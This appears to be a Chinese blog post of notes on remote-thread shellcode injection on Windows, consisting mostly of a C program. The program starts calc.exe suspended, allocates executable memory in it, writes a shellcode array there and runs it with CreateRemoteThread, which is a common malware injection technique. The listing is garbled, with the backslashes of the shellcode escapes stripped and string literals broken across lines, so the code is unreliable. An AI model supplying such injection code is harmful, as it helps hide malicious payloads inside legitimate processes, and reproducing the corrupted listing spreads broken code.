• 远程线程注入shellcode笔记

    #include "stdafx.h"
#include <windows.h>
#include <stdio.h>

char shellcode[] = "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42"
		"x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03"
		"x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b"
		"x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e"
		"x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c"
		"x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74"
		"x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe"
		"x49x0bx31xc0x51x50xffxd7";


BOOL injection()
{
	wchar_t Cappname[MAX_PATH] = {0};
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID lpMalwareBaseAddr;
	LPVOID lpnewVictimBaseAddr;
	HANDLE hThread;
	DWORD dwExitCode;
	BOOL bRet = FALSE;

	lpMalwareBaseAddr = shellcode;

	//获取计算器的地址,接下来将启动一个计算器
	GetSystemDirectory(Cappname,MAX_PATH);
	_tcscat(Cappname,L"\calc.exe");
	printf("Injection program Name:%S
",Cappname);

	ZeroMemory(&si,sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi,sizeof(pi));

	//创建计算器
	if (CreateProcess(Cappname,NULL,NULL,NULL,
		FALSE,CREATE_SUSPENDED
		,NULL,NULL,&si,&pi) == 0)
	{
		return bRet;
	}

	//开辟内存空间大小
	lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
		,NULL,sizeof(shellcode)+1,MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE);

	if (lpnewVictimBaseAddr == NULL)
	{
		return bRet;
	}

	//将SHELLCODE写入
	WriteProcessMemory(pi.hProcess,lpnewVictimBaseAddr,
		(LPVOID)lpMalwareBaseAddr,sizeof(shellcode)+1,NULL);

	//创建线程
	hThread = CreateRemoteThread(pi.hProcess,0,0,
		(LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr,NULL,0,NULL);

	//等待结束进程
	WaitForSingleObject(pi.hThread,INFINITE);
	GetExitCodeProcess(pi.hProcess,&dwExitCode);
	TerminateProcess(pi.hProcess,0);
	return bRet;
}

void help(char* proc)
{
	printf("%s:[-] start a process and injection shellcode to memory
",proc);
}

int main(int argc,char* argv[])
{
	help(argv[0]);
	injection();
}

     
  • 相关阅读:
    hibernate下载及配置超详细!
    如何新建一个jar包库?
    MySQL 之 索引原理与慢查询优化
    MySQL 之 视图、触发器、存储过程、函数、事物与数据库锁
    MySql之数据操作
    MySQL 之多表查询
    MySQL 简洁 数据操作 增删改查 记不住的 看这里把
    python 并发之多进程实现
    koa-static与react-create-app搭配的路径
    koa中返回404并且刷新后才正常的解决方案
  • 原文地址:https://www.cnblogs.com/killbit/p/5971446.html
Copyright © 2020-2023  润新知